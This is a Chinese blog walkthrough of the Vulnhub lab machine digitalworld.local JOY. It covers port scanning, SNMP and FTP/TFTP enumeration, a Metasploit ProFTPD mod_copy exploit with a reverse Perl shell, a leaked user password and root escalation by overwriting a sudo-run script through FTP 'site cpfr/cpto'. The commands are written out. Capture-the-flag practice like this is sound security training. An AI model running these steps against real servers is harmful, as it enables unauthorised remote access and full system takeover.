[Vulnhub] digitalworld.local-JOY snmp+ProFTPD权限提升

最新推荐文章于 2024-08-16 09:41:10 发布
最新推荐文章于 2024-08-16 09:41:10 发布
阅读量305 收藏 5
点赞数 4
分类专栏: Vulnhub 文章标签: 网络
Whoami? Martin
本文链接:https://blog.csdn.net/qq_51886509/article/details/140470729
版权

信息收集

IP AddressOpening Ports
192.168.101.150TCP:21,22,25,80,110,139,143,445,465,587,993,995

$ nmap -p- 192.168.101.150 --21,22,25,min-rate 1000 -sC -sV

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxr-x   2 ftp      ftp          4096 Jan  6  2019 download
|_drwxrwxr-x   2 ftp      ftp          4096 Jan 10  2019 upload
22/tcp  open  ssh         Dropbear sshd 0.34 (protocol 2.0)
25/tcp  open  smtp        Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
80/tcp  open  http        Apache httpd 2.4.25
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2016-07-19 20:03  ossec/
|_
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Index of /
110/tcp open  pop3        Dovecot pop3d
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after:  2032-10-05T17:23:23
|_pop3-capabilities: CAPA RESP-CODES SASL PIPELINING AUTH-RESP-CODE UIDL STLS TOP
|_ssl-date: TLS randomness does not represent time
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: more IDLE listed have LOGIN-REFERRALS ENABLE post-login LITERAL+ LOGINDISABLEDA0001 ID capabilities Pre-login IMAP4rev1 OK STARTTLS SASL-IR
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after:  2032-10-05T17:23:23
445/tcp open  netbios-ssn Samba smbd 4.5.12-Debian (workgroup: WORKGROUP)
465/tcp open  smtp        Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
587/tcp open  smtp        Postfix smtpd
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
993/tcp open  ssl/imap    Dovecot imapd
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after:  2032-10-05T17:23:23
|_imap-capabilities: IDLE listed more LOGIN-REFERRALS ENABLE post-login LITERAL+ have ID capabilities Pre-login IMAP4rev1 OK AUTH=PLAINA0001 SASL-IR
|_ssl-date: TLS randomness does not represent time
995/tcp open  ssl/pop3    Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: CAPA RESP-CODES SASL(PLAIN) USER AUTH-RESP-CODE UIDL PIPELINING TOP
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after:  2032-10-05T17:23:23
Service Info: Hosts: The,  JOY.localdomain, 127.0.1.1, JOY; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.5.12-Debian)
|   Computer name: joy
|   NetBIOS computer name: JOY\x00
|   Domain name: \x00
|   FQDN: joy
|_  System time: 2024-07-16T13:11:48+08:00
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2024-07-16T05:11:48
|_  start_date: N/A
|_nbstat: NetBIOS name: JOY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: -1s

ProFTPD 本地权限

image.png

$ sudo nmap -Pn -sU -A --top-ports=20 -v 192.168.101.150

snmp泄露有关正在运行的服务的大量信息。

image-1.png

image-2.png

$ ftp 192.168.101.150

ftp> get directory

通过匿名登录下载directory

image-3.png

关于patrick用户directory目录

image-4.png

$ tftp 192.168.101.150 36969

通过tftp下载文件version_control

image-5.png

ProFTPD版本为1.3.5

目录/var/www/tryingharderisjoy

image-6.png

image-7.png

use exploit/unix/ftp/proftpd_modcopy_exec
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set RHOSTS 192.168.101.150
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set payload payload/cmd/unix/reverse_perl
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set LHOST 192.168.101.128
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set SITEPATH /var/www/tryingharderisjoy
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > run

image-8.png

www-data@JOY:/var/www/tryingharderisjoy/ossec$ cat patricksecretsofjoy

patrick:apollo098765

www-data@JOY:/var/www/tryingharderisjoy/ossec$ su patrick

image-9.png

权限提升

patrick@JOY:/tmp$ sudo -l

image-10.png

$ echo '/bin/bash' >test

$ ftp 192.168.101.150

ftp> cd upload
ftp> put test

image-11.png

telnet 192.168.101.150 21
site cpfr /home/ftp/upload/test
site cpto /home/patrick/script/test

image-12.png

patrick@JOY:~$ sudo /home/patrick/script/test

image-13.png

Proof.txt 截屏

image-14.png

Proof.txt 内容

Never grant sudo permissions on scripts that perform system functions!

Мартин.
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
digitalworld.local: JOYftp将可读文件夹上传到可写文件夹)
墨痕诉清风的博客
04-29 1063
所以,当我们运行测试脚本时,它没有提供任何有用的东西,因为它是一个测试工作bash脚本的演示,因此文件“test”是无用的,但它由root用户拥有,这对我们来说是可疑的。因此,我们创建了一个恶意文件,在给定命令的帮助下获取bash shell,并命名为“test”,然后尝试将其上传到/upload目录中,因为它是一个可写文件夹。因此,我们再次决定使用FTP匿名登录来替换真正的/test文件与伪造的/test文件,这将是一个后门,以提供更高的特权外壳。txt文件和机密文件。
Vulnhub:Digitalworld.local (JOY)靶机
qq_43884092的博客
04-14 421
使用enum4linux枚举目标smb服务,发现两个系统用户,ftp可以匿名登陆,目录权限属主和树组都是ftp用户,猜测:访问的是ftp用户的家目录,upload目录中的directory文件内容,图中文件和目录权限version_control可能会有有用 的信息,复制version_control文件到/home/ftp/upload目录,msf模块exploit/unix/ftp/proftpd_modcopy_exec拿shell
Vulnhub靶机 Digitalworld.local (JOY)
菜浪马废的博客
05-03 815
ftp可以任何人登录 查看一下 查看version_control文件 看见:proftpd 1.3.5
digitalworld.local: JOY靶机-Walkthrough
ins1ght的博客
10-02 632
通过FTP匿名账户获取directory,对其中的信息筛选后,确定version_control为线索。site cpto将version_control拷贝到FTP的upload文件夹,最终发现ProFTPD存在命令执行漏洞,成功getshell。之后发现了patrick用户的密码,切换用户后,发现了sudo权限的test。由于patrick没有test的写权限,于是先创建一个test,内容为/bin/sh,后用put test上传到upload文件夹中,最后使用site cpto覆盖原有test,提权。
靶机渗透练习57-digitalworld.localJOY
hirak0的博客
04-19 4025
靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-joy,298/ Description Does penetration testing spark joy? If it does, this machine is for you. This machine is full of services, full of fun, but how many ways are there to align the stars? Perhaps
vulnhub -digitalworld.local: JOY (考点:ftp&ProFTPD漏洞/ linux提权知识)
冬萍子癸水
04-24 1206
https://www.vulnhub.com/entry/digitalworldlocal-joy,298/ nat网络 arp-scan -l 比平常多出来的ip就是靶机了 nmap 很多端口,25和110想到smtp枚举邮件用户,和邮件查看。22想到ssh登录139 445想到smb查看敏感文件,21想到ftp查看敏感文件。 PORT STATE SERVICE VER...
红队打靶练习:DIGITALWORLD.LOCAL: JOY
分享
12-23 514
红队打靶练习:DIGITALWORLD.LOCAL: JOY , 犹如沙虫埋伏般的惊悚感......
Digitalworld.local: JOY Vulnhub靶场题解
qq_42133828的博客
08-16 910
前期准备 镜像下载 https://www.vulnhub.com/entry/digitalworldlocal-joy,298/ 环境配置: 在VM以net连接打开虚拟机 使用的机器: 攻击机:kali linux,ubuntu 靶机:ip随配(192.168.119.137) 渗透开始 1.nmap发现主机,并扫描其ip信息 nmap -A 192.168.119.137 2.发现ftp相...
[Vulnhub] violator ProFTPD+权限提升
07-15 254
ProFTPD权限提升
主机域名ISPConfig 3.0.1.3-ispconfig3-codepub
12-24
3. **多用户权限**:ISPConfig 3支持不同级别的用户访问,如超级管理员、系统管理员、客户和子客户。这使得服务提供商可以为客户提供自助服务,同时保持对服务器的全面控制。 4. **安装和配置**:安装ISPConfig 3...
Linux Apache+Proftpd构建虚拟主机时要注意的几个安全问题
09-16
### Linux Apache+Proftpd构建虚拟主机的安全注意事项 在Linux环境下使用Apache与Proftpd构建虚拟主机时,安全是至关重要的。以下几点是构建过程中需要注意的关键安全问题: #### 1. 用户隔离与权限管理 - **Host...
proftpd-1.3.7a.tar.gz
07-28
版本1.3.7a是ProFTPD的一个稳定版本,可能包含了前一版本的错误修复、性能提升和新功能的添加。在安装之前,最好查阅官方文档了解此版本的具体改进。 4. **安装过程** 解压`proftpd-1.3.7a.tar.gz`后,会得到一个...
cpx_proftpd:漏洞利用工具 CVE-2015-3306
06-11
cpx_proftpd Daniel Aldana 针对漏洞利用的 PoC。 Vadim Melihow 报告的错误。 ###方法1: 用法: python cpx_proftp.py <IP> <REMOTE> 前任: python cpx_proftp.py 127.0.0.1 /etc/passwd /var/...
centos7下proftpd+mysql安装配置.zip
08-21
proftpd全称:Professional FTP daemon,是针对Wu-FTP的弱项而开发的,除了改进的安全性,还具备许多Wu-FTP没有的特点,能以Stand-alone、xinetd模式运行等。ProFTP已经成为继Wu-FTP之后最为流行的FTP服务器软件,...
Connection reset by peer报错解决
最新发布
m0_65307735的博客
08-16 231
Connection reset by peer报错解决
10.1 网络基础知识
yoyo勰的博客
08-14 150
了解非授权访问没有预先经过同意,就使用网络或计算机资源则被看作非授权访问,如有意避开系统访问控制机制,对网络设备及资源进行非正常使用,或擅自扩大权限,越权访问信息。它主要有以下几种形式:假冒、身份攻击、非法用户进入网络系统进行违法操作、合法用户以未授权方式进行操作等。信息泄漏或丢失指敏感数据在有意或无意中被泄漏出去或丢失,它通常包括:信息在传输中丢失或泄漏、信息在存储介质中丢失或泄漏以及通过建立隐蔽隧道等窃取敏感信息等。
使用WebSocket实现一个简易的聊天室
qq_51321722的博客
08-14 404
其次,要有相关配置类以及Controller。我这里的框架是SpringBoot。首先,我们要有一个前端页面。
搭载海光3350处理器的高速流量处理模块(用于高速网络数据处理设备应用)
Future_2024的博客
08-15 443
高速流量处理模块通常是指在网络设备中用于处理大量数据流的硬件或软件组件。
proftpd可能会导致network-manager.service无法使用吗
06-02
在一般情况下,proftpd和network-manager.service之间没有直接关系,因此proftpd不应该导致network-manager.service无法使用。但是,如果你在安装proftpd时进行了一些不当操作,例如修改了一些系统配置文件,这可能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值